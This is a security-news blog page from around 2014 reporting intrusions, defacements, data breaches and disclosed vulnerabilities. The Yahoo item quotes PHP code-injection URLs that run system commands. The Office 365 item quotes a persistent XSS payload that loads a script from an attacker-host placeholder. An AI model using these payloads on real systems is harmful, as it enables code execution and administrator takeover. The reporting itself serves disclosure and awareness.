Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Xtreme RAT Trojan
Cyber Attacks Security Breach Targeted cyber attacks Xtreme RAT Trojan

Hackers used Xtreme RAT malware to gain access to Israeli Defense computer



 
Seculert, an Israel Cyber Security firm, told Reuters that hackers gained access to the Israeli Defense ministry computer by sending a malicious email containing an Xtreme RAT.

Seculert CTO Aviv Raff told Reuters that earlier this month hackers took control of around 15 computers including the Israel's Civil Administration computer which monitors Palestinians in Israeli-occupied territory.

The firm declined to identify other 14 computers targeted by the hackers. An anonymous source told Reuters these included companies involved in supplying Israeli defense infrastructure.

The latest attack is appeared to be originated from US servers. However, experts noticed some similarities to previous attacks. The firm suspects the Palestinians to be behind the cyber attack.

The firm hadn't determined what hackers did after gaining access to the systems. It believes that hackers had access to the infected computers several days.

Xtreme RAT is the remote access trojan that gives hackers complete access to the infected systems. An attacker is able to steal any documents or execute any other malware code in the system.

The same malware has been used in several other targeted-attacks including attacks targeting 'the Israeli police department', 'syrian anti-government activists' and other governments.
Read more »
Vulnerability
Bug Bounty Hunter Bug Bounty Programs Ebrahim Hegazy PHP Code Injection Remote Code Execution Vulnerability

Ebrahim Hegazy discovered PHP Code Injection Vulnerability in Yahoo

PHP Code Injection vulnerability

 A Web application penetration tester, Ebrahim Hegazy, has discovered a critical remote PHP code injection vulnerability in the Yahoo website that could allowed hackers to inject and execute any php code on the Yahoo server.

The vulnerability exists in the Taiwan sub-domain of the Yahoo "
http://tw.user.mall.yahoo.com/rating/list?sid=[CODE_Injection]".  The 'sid' parameter allows to inject PHP code.

According to his blog post, the sid parameter might have been directly passed to an eval() function that results in the code Injection.

In his demo, Ebrahim showed how he to get the directories list and process list by injecting the following code:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“dir”))}
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“ps”))}

He also found out that Yahoo server is using an outdated kernel which is vulnerable to "Local Privilege escalation" vulnerability.

Yahoo immediately fixed the issue after getting the notification from the researcher.  However, he is still waiting for the Bug bounty reward for the bug.  Google pays $20,000 for such kind of vulnerabilities. Yahoo sets the maximum bounty amount as "$15,000".  Let us see how much bounty Yahoo offers for this vulnerability.

POC Video:


Last month, German Security researcher David Vieira-Kurz discovered similar remote code execution vulnerability in the Ebay website.
Read more »
Hacking News
Defaced Website Hacking News

MS Dhoni official website hacked by United Bangladeshi Hackers


MS Dhoni, the captain Indian Cricket Team, Official website has been hacked and defaced by Bangladeshi Hacker group called as "United Bangladeshi Hackers".

The defacement was first discovered and reported by the Techgator .

Hackers didn't deface the home page.  They just managed to have uploaded a text file named "bd.txt" in the "Uploadedfiles" directory ("http://www.dhoniworld.com/uploadedfiles/bd.txt").

We are not sure how hackers managed to hack the website whether they have admin access or just some "Unrestricted File Upload" vulnerability.

"Hacked By Black Tiger From United Bangladeshi Hackers.Stop Abusing Our Test Cricket.Don't Try To Play With Fire. We Are Bangladeshi Hackers. Mind It!" The defacement left in the page reads.

After checking the Uploadedfiles directory, we came to know that this is not the first time the website being hacked by hackers.  Several other hacker group also managed to upload a text as well as image files.  It appears hackers also attempt to upload C99 backdoor shell.


*Update: Nope, It is not hacked
One of EHN reader Sri Ram Shyam contacted me and provide more info how hackers managed to upload the files.  


It is neither "unrestricted file upload" nor any other vulnerability.  The form itself allows to upload only image/text files.  I believe it is not harmful for the website in anyway.
Read more »
Hacking News
Breaking News Data Breach Hacking News

Michaels Stores may be third major retailer to be victim of security breach

It looks like Security Blogger Brian Krebs brought another possible data breach to light.  This time it is Michaels Stores -biggest specialty retailer of arts, crafts and more.

The company said on Saturday that it started the investigation after learning of possible fraudulent activity on some U.S payment cards which had been used at Michaels' stores.

Michaels Stores said it is working with federal law enforcement and hired third party forensic investigators to determine if there had been any data breach.

While the company said it has not yet confirmed a data breach,  the company has decided it is better to notify its customers so that they can protect themselves.

This is third biggest credit card cyber attack reported in recent months.  In December 2013, US retail giant Target reported a data breach affecting 40 million customers.  Earlier this month, US luxury retailer Neiman Marcus also notified about a data breach that exposed approximately 1.1 million credit and debit cards to hackers.
Read more »
Massive cyber attack
Breaking News Cyber Attacks Malware Report Massive cyber attack

No, Your fridge is not sending spam emails - They are innocent

A recent report from security firm Proofpoint saying "Internet connected Refrigerators are participating in massive cyber attack" is one of the hot topic on Information Security.

The report said that a massive global cyber attack involved more than 750k malicious emails relied on more than 100k consumer gadgets such as routers, multimedia systems, tvs and refrigerator.

However, a recent report form Symantec says "Internet of Things" devices including the Internet-connected fridge are not source of this spam campaign.

Symantec confirmed the source of spam as several windows-based computers, and none of them were originated from any non-windows based computer systems.

"if your refrigerator uses a feature known as port forwarding and someone contacts the IP address on port 80, that traffic is allowed to reach your smart refrigerator."Symantec report reads.


"Viewed from outside, all you will see is the refrigerator and you may not even realize there is a router with potentially many other devices behind it, such as an infected computer." Symantec experts explained that it might be the reason why researchers mistakenly considered the IoT devices as source for the spam campaign.

Even though the IoT devices such as fridge are innocent at this time, experts say that we can expect them to be exploited by cyber criminals in future.  Researchers also pointed out that there is already few malware targeting Linux-based IoT devices. 
Read more »
Hacking News
defacement Hacking News

Official websites of Daler Mehndi and Raghav hacked by Haxor 99


A Pakistani hacker with handle "Haxor 99" from Team MadLeets, has hacked into the official website belong to Indian Pop singer "Daler Mehndi"- Known for his work on Rang De Basanti movie.

"your site security is compromised" The hacker wrote on the defacement page.  "Nothing Delete or Harmed...Rise a Voice for Justice of Kashimr.  Patch Your Site"

He also defaced the official website of Raghav Mathur - a Canadian singer.  The same message left in the defacement.

Affected websites:
www.dalermehndi.com
www.raghav.com

At the time of writing, both websites are still defaced.  You can also check the mirror of the defacement here:
http://www.zone-h.org/archive/notifier=haxor%2099
Read more »
Security Breach
Data Breach Security Breach

Data Breach : Laptops containing personal information of 74k people stolen from Coca-Cola


Coca-Cola company has reported a data breach on friday.  74,000 people are at risk after laptops containing their personal details have been stolen from the company's Atlanta headquarters.

According to the Wall Street Journal report, it includes the information belong to employees, supplies and contractors.

The laptops contained information such as Social Security numbers, addresses, driver's license numbers, some financial details and other personal information.

As per the Coca-cola's policies, the laptop must have been encrypted.  The worst part is that the stolen laptops weren't encrypted.

The company learned about the data breach on Dec. 10,2013.  The laptops apparently were stolen by former employee who was in charge of maintaining or disposing of equipment. 

The affected individuals have been notified about the breach and they are also offered free credit card monitoring service.
Read more »
Ethical Hacking Training
Certified WhiteHat Hacker CWHH Ethical Hacking Training

Certified Whitehat Hacker Level 1 Training

Cyber Security Privacy Foundation(CSPF) invites you all to be a part of our Certified WhiteHat Hacker Level I training on 8th of February 2014, in Chennai.

The Level 1 is for everyone(even if you dont have any technical knowledge).  This is a basic kick starter for people who want to get into Cyber Security Industry. This is specially for people who have no background knowledge in security so that you start off your journey into Security.

Free Education to Below poverty line students:
CSPF provides free training for students who are financially weak.  Such students can contact CSPF directly by mailing us at “founder@cysecurity.org” with their details and the BPL Card.

We are also proud to say very soon CWHH Level 1 Training in Bangalore is going to be launched with Center for Internet Studies(CIS) and Canadian University.

The fees for this Level 1 course is: Rs. 600/-.  Register before January 30,2014, the price will increase after that date.

Registration Link:

http://www.meraevents.com/event/certified-white-hat-hacker-level-1_1

Note: There will be No on spot registration.

You can find more details about the course here.
Read more »
Web Application Vulnerability
Persistent Cross Site Scripting Vulnerability Web Application Vulnerability

Persistent XSS Vulnerability in Office 365 website allows to hack Admin account



Cogmotive firm has discovered a potentially critical persistent cross site scripting(XSS) vulnerability in the Office 365 - a cloud version of office.  A successful exploitation allows attacker to take control of the administrator account.

To exploit this vulnerability, you have to be one of the user.  A malicious employee can change their own Display name to XSS vectors.

For instance, an attacker can modify his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'
User administration page usually display the list of users in the portal.  So, if an user changes his name, it will be reflected in that page.

When an admin user log into the portal and access the "User administration" page, the payload will get executed.  It will load the malicious javascript file hosted in attacker's server and execute.

An attacker can exploit this vulnerability to create administrator within the company’s Office 365 environment.

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365." Alan Byrne, Co-founder of Cogmotive said in company's blog.

Alan immediately reported the bug to Microsoft on October 2013.  On December 2013, Microsoft patched the vulnerability.




Read more »
Twitter account hacked
Featured Hacking News Syrian Electronic Army Twitter account hacked

CNN Twitter account and blog hacked by Syrian Electronic Army


Fake article posted by Syrian electronic Army

Just few hours ago, Syrian Electronic Army hijacked the official twitter account of CNN and started to posted series of tweets.

Hackers mentioned the hack is part of retaliation against CNN for "viciously lying reporting aimed at prolonging the suffering in #Syria."

"#CNN used its usual formula of present unverifiable information as truth, adopting a report by Qataris against #Syria." one of the tweets posted by hacker reads.

The group appears to have compromised the main twitter account @CNN and @natlsecuritycnn, main facebook page of CNN, CNN politics' facebook page.



"US Media strategy is now to hide the fact that the CIA controls and funds Al Qaeda by blaming #Syria instead for their terror. #SEA" Recent tweet from group reads.

The group also managed to compromise the "CNN Security Clearance", "Political Ticker", "The Lead", "The Situation Room" and "Crossfire" blogs.

The also managed to post a fake article entitled "BREAKING NEWS: US declares state of national emergency, State department reportedly out of reach"

  • http://security.blogs.cnn.com/2014/01/23/breaking-news-us-declares-state-of-national-emergency-state-department-reportedly-out-of-reach/
  • "China dumps all bonds, declares South China Sea closed zone ": http://politicalticker.blogs.cnn.com/2014/01/23/breaking-china-dumps-all-bonds-declares-south-china-sea-closed-zone/ 
  • http://situationroom.blogs.cnn.com/2014/01/23/breaking-china-dumps-all-bonds-declares-south-china-sea-closed-zone/


CNN confirmed the hack in their recent tweet saying " Some of our organization's social media accounts were compromised. We have secured those accounts and deleted unauthorized tweets."
Read more »
Hacking News
Defaced Website Hacking News

WHMCS Documentation website hacked by b0x

A Hacker with online name "b0x", also one of the admin of MadLeets hackers forum, has hacked into the WHMCS website - A company that offers client management, billing& support solutions for online businesses.

The main page or website is not affected by this  breach.  Hacker managed to upload a html file "b0x.html" in the image directory of WHMCS documentation website(docs.whmcs.com).

Hacker didn't leave any message other than "b0x" in the defacement page.  Whenever main page of a website is not defaced, it will take time to admin to notice it.  So, we are still able to see the defacement at "http://docs.whmcs.com/images/b0x.html".

Hacker also provided mirror of the defacement " http://zone-h.org/mirror/id/21518159".

This is not the first time WHMCS being victim of hackers attack.  In 2012, the infamous UGNazi hacker group break into WHMCS using Social Engineering attack.

Update:

"Our system admin team just evaluated the server and b0x.html had a timestamp dating back to 2012. At the current time it is our belief that this was the result of a previous vulnerability related to mediawiki and no defacement has taken place." WHMCS representatives told Softpedia.
Read more »
Subscribe to: Comments (Atom)